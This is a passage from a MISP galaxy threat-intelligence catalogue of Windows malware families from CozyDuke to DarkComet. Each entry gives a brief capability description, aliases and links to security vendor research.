https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper

https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/

https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html

COZYDUKE

CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around a core backdoor component. This component can be instructed by the C&C server to download and execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array of functionality. Known CozyDuke modules include: • Command execution module for executing arbitrary Windows Command Prompt commands • Password stealer module • NT LAN Manager (NTLM) hash stealer module • System information gathering module • Screenshot module

The tag is: misp-galaxy:malpedia="COZYDUKE"

COZYDUKE is also known as:

  • Cozer

  • CozyBear

  • CozyCar

  • EuroAPT

Table 3218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

crackshot

CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.

The tag is: misp-galaxy:malpedia="crackshot"

crackshot is also known as:

Table 3219. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot

https://content.fireeye.com/apt-41/rpt-apt41/

CradleCore

The tag is: misp-galaxy:malpedia="CradleCore"

CradleCore is also known as:

Table 3220. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore

CRAT

According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.

The tag is: misp-galaxy:malpedia="CRAT"

CRAT is also known as:

Table 3221. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.secrss.com/articles/18635

https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg

https://suspected.tistory.com/269

https://blog.talosintelligence.com/2020/11/crat-and-plugins.html

CREAMSICLE

The tag is: misp-galaxy:malpedia="CREAMSICLE"

CREAMSICLE is also known as:

Table 3222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Credraptor

The tag is: misp-galaxy:malpedia="Credraptor"

Credraptor is also known as:

Table 3224. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

CreepySnail

The tag is: misp-galaxy:malpedia="CreepySnail"

CreepySnail is also known as:

Table 3225. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creepysnail

https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

CreepExfil

The tag is: misp-galaxy:malpedia="CreepExfil"

CreepExfil is also known as:

Table 3226. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.creep_exfil

https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/

Crenufs

The tag is: misp-galaxy:malpedia="Crenufs"

Crenufs is also known as:

Table 3227. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs

Crimson RAT

It was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computers.

Some of the features of Crimson RAT include:

Remote control of infected computers Data theft, such as passwords, files, and emails User spying Takeover of infected computers Locking of infected computers Extortion of payments

The tag is: misp-galaxy:malpedia="Crimson RAT"

Crimson RAT is also known as:

  • SEEDOOR

  • Scarimson

Table 3228. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson

https://twitter.com/katechondic/status/1502206599166939137

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://www.secrss.com/articles/24995

https://s.tencent.com/research/report/669.html

https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ

https://twitter.com/teamcymru_S2/status/1501955802025836546

https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://securelist.com/transparent-tribe-part-1/98127/

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1

https://securelist.com/transparent-tribe-part-2/98233/

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://blog.yoroi.company/research/transparent-tribe-four-years-later

https://twitter.com/teamcymru/status/1351228309632385027

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf

https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg

https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/

https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg

https://www.seqrite.com/blog/transparent-tribe-apt-actively-lures-indian-army-amidst-increased-targeting-of-educational-institutions

https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/

https://www.4hou.com/posts/vLzM

https://securelist.com/apt-trends-report-q3-2020/99204/

https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/

CrimsonIAS

According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.

The tag is: misp-galaxy:malpedia="CrimsonIAS"

CrimsonIAS is also known as:

Table 3229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias

https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/

CrossLock

The tag is: misp-galaxy:malpedia="CrossLock"

CrossLock is also known as:

Table 3231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crosslock

https://twitter.com/1ZRR4H/status/1648232869809078273

CROSSWALK

According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.

The tag is: misp-galaxy:malpedia="CROSSWALK"

CROSSWALK is also known as:

  • Motnug

  • ProxIP

  • TOMMYGUN

Table 3232. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk

https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://thehackernews.com/2021/01/researchers-disclose-undocumented.html

https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/

https://www.youtube.com/watch?v=FttiysUZmDw

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://securelist.com/apt-trends-report-q3-2020/99204/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.youtube.com/watch?v=8x-pGlWpIYI

https://content.fireeye.com/apt-41/rpt-apt41/

https://twitter.com/MrDanPerez/status/1159459082534825986

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

Croxloader

According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).

The tag is: misp-galaxy:malpedia="Croxloader"

Croxloader is also known as:

Table 3233. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.croxloader

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

CruLoader

The tag is: misp-galaxy:malpedia="CruLoader"

CruLoader is also known as:

Table 3234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader

https://malwarebookreports.com/cruloader-zero2auto/

CryLocker

The tag is: misp-galaxy:malpedia="CryLocker"

CryLocker is also known as:

Table 3237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker

Crypt0l0cker

The tag is: misp-galaxy:malpedia="Crypt0l0cker"

Crypt0l0cker is also known as:

Table 3239. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker

http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html

CryptBot

A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.

The tag is: misp-galaxy:malpedia="CryptBot"

CryptBot is also known as:

Table 3240. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/

https://asec.ahnlab.com/en/35981/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://asec.ahnlab.com/en/31683/

https://experience.mandiant.com/trending-evil-2/p/1

https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/

https://www.mandiant.com/resources/russian-targeting-gov-business

https://asec.ahnlab.com/en/31802/

https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html

https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger

https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/

https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/

https://asec.ahnlab.com/en/26052/

https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer

https://asec.ahnlab.com/en/24423/

https://fr3d.hk/blog/cryptbot-too-good-to-be-true

https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf

https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf

CrypticConvo

CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.

The tag is: misp-galaxy:malpedia="CrypticConvo"

CrypticConvo is also known as:

Table 3241. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo

https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/

CryptNET

According to OALabs, this ransomware has the following features: * Files are encrypted with AES CBC using a generated 256 bit key and IV. * The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.

The tag is: misp-galaxy:malpedia="CryptNET"

CryptNET is also known as:

Table 3242. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptnet

https://research.openanalysis.net/dotnet/cryptnet/ransomware/2023/04/20/cryptnet.html

CryptoClippy

The tag is: misp-galaxy:malpedia="CryptoClippy"

CryptoClippy is also known as:

Table 3243. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoclippy

https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/

CryptoDarkRubix

The tag is: misp-galaxy:malpedia="CryptoDarkRubix"

CryptoDarkRubix is also known as:

  • Ranet

Table 3244. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix

https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html

CryptoJoker

CryptoJoker is an open source ransomware written in C#. CryptoJoker uses a combination of a "custom XOR" encryption and RSA. A private public/private pair key is generated for every computer.

The tag is: misp-galaxy:malpedia="CryptoJoker"

CryptoJoker is also known as:

  • PlutoCrypt

Table 3245. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptojoker

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/plutocrypt-a-cryptojoker-ransomware-variant

CryptoPatronum

CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.

The tag is: misp-galaxy:malpedia="CryptoPatronum"

CryptoPatronum is also known as:

Table 3249. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum

https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html

Cryptorium

The tag is: misp-galaxy:malpedia="Cryptorium"

Cryptorium is also known as:

Table 3250. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium

https://twitter.com/struppigel/status/810770490491043840

Cryptowall

CryptoWall is a ransomware, is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware and uses a Trojan horse to deliver the malicious payload.

The tag is: misp-galaxy:malpedia="Cryptowall"

Cryptowall is also known as:

Table 3253. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://sites.temple.edu/care/ci-rw-attacks/

https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f

CryptoRansomeware

The tag is: misp-galaxy:malpedia="CryptoRansomeware"

CryptoRansomeware is also known as:

Table 3256. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware

https://twitter.com/JaromirHorejsi/status/818369717371027456

csharp-streamer RAT

The tag is: misp-galaxy:malpedia="csharp-streamer RAT"

csharp-streamer RAT is also known as:

Table 3260. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.csharpstreamer

https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/

Cuba

Ransomware.

The tag is: misp-galaxy:malpedia="Cuba"

Cuba is also known as:

  • COLDDRAW

Table 3262. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba

https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/

https://www.mandiant.com/resources/unc2596-cuba-ransomware

https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/

https://blog.group-ib.com/hancitor-cuba-ransomware

https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more

https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware

https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-on+a+roll.pdf[https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group-+on+a+roll.pdf]

https://www.ic3.gov/Media/News/2021/211203-2.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/

https://lab52.io/blog/cuba-ransomware-analysis/

https://securelist.com/cuba-ransomware/110533/

https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis

https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf

https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.quorumcyber.com/threat-actors/scattered-spider-threat-actor-profile/

Curator

Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.

The tag is: misp-galaxy:malpedia="Curator"

Curator is also known as:

  • Ever101

  • SunnyDay

Table 3266. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.curator

https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/

https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf

https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/

Cursed Murderer

Ransomware.

The tag is: misp-galaxy:malpedia="Cursed Murderer"

Cursed Murderer is also known as:

Table 3267. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer

https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html

CustomerLoader

CustomerLoader is a .Net-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.

The tag is: misp-galaxy:malpedia="CustomerLoader"

CustomerLoader is also known as:

Table 3268. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.customerloader

https://blog.sekoia.io/customerloader-a-new-malware-distributing-a-wide-variety-of-payloads/#h-c2-servers

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

CyberSplitter

The tag is: misp-galaxy:malpedia="CyberSplitter"

CyberSplitter is also known as:

Table 3272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter

CycBot

The tag is: misp-galaxy:malpedia="CycBot"

CycBot is also known as:

Table 3273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot

https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/

Cyrat

According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.

The tag is: misp-galaxy:malpedia="Cyrat"

Cyrat is also known as:

Table 3274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat

https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html

https://www.gdatasoftware.com/blog/cyrat-ransomware

cysxl

The tag is: misp-galaxy:malpedia="cysxl"

cysxl is also known as:

Table 3275. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl

https://www.enigmasoftware.com/bkdrcysxla-removal/

Dacls (Windows)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (Windows)"

Dacls (Windows) is also known as:

  • MATA

Table 3276. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

https://malwareandstuff.com/peb-where-magic-is-stored/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/dark-river-you-can-t-see-them-but-they-re-there/

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://www.sygnia.co/mata-framework

https://securelist.com/apt-trends-report-q2-2020/97937/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/18092216/Updated-MATA-attacks-Eastern-Europe_full-report_ENG.pdf

https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html

https://vblocalhost.com/uploads/VB2021-Park.pdf

DADJOKE

DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.

The tag is: misp-galaxy:malpedia="DADJOKE"

DADJOKE is also known as:

Table 3277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke

https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts

https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/

https://www.youtube.com/watch?v=vx9IB88wXSE

https://twitter.com/ClearskySec/status/1110941178231484417

https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9

https://twitter.com/a_tweeter_user/status/1154764787823316993

DanaBot

Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

The tag is: misp-galaxy:malpedia="DanaBot"

DanaBot is also known as:

Table 3280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.youtube.com/watch?v=04RsqP_P9Ss

https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1

https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://asert.arbornetworks.com/danabots-travels-a-global-perspective/

https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense

https://security-soup.net/decoding-a-danabot-downloader/

https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/

https://assets.virustotal.com/reports/2021trends.pdf

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html

https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://malwareandstuff.com/deobfuscating-danabots-api-hashing/

https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/

https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/

https://www.esentire.com/blog/from-darkgate-to-danabot

https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors

https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service

https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns

https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0

https://asec.ahnlab.com/en/30445/

https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot

https://www.mandiant.com/resources/supply-chain-node-js

https://twitter.com/f0wlsec/status/1459892481760411649

https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/

https://research.checkpoint.com/danabot-demands-a-ransom-payment/

https://blog.lexfo.fr/danabot-malware.html

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.esentire.com/blog/danabots-latest-move-deploying-icedid

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/

https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/

https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor

https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed

https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques

danbot

Danbot is a backdoor malware that is originally written in C#. Recent versions of Danbot are written in C++. Danbot is capable of giving a remote attacker remote access features such as running a cmd command, upload and download files, move and copy files. The backdoor commands are transmitted by either using HTTP or DNS protocols. The commands are encapsulated in an XML file that gets stored in disk. Danbot’s backdoor component picks up the XML file where it decodes and decrypts the commands.

The tag is: misp-galaxy:malpedia="danbot"

danbot is also known as:

Table 3281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-lyceum

https://www.youtube.com/watch?v=FttiysUZmDw

https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f

DarkCloud Stealer

Stealer is written in Visual Basic.

The tag is: misp-galaxy:malpedia="DarkCloud Stealer"

DarkCloud Stealer is also known as:

Table 3283. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

https://asec.ahnlab.com/en/53128/

https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/

DarkComet

DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.

The tag is: misp-galaxy:malpedia="DarkComet"

DarkComet is also known as:

  • Breut

  • Fynloski

  • klovbot

Table 3284. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html

https://content.fireeye.com/apt/rpt-apt38

https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf

https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

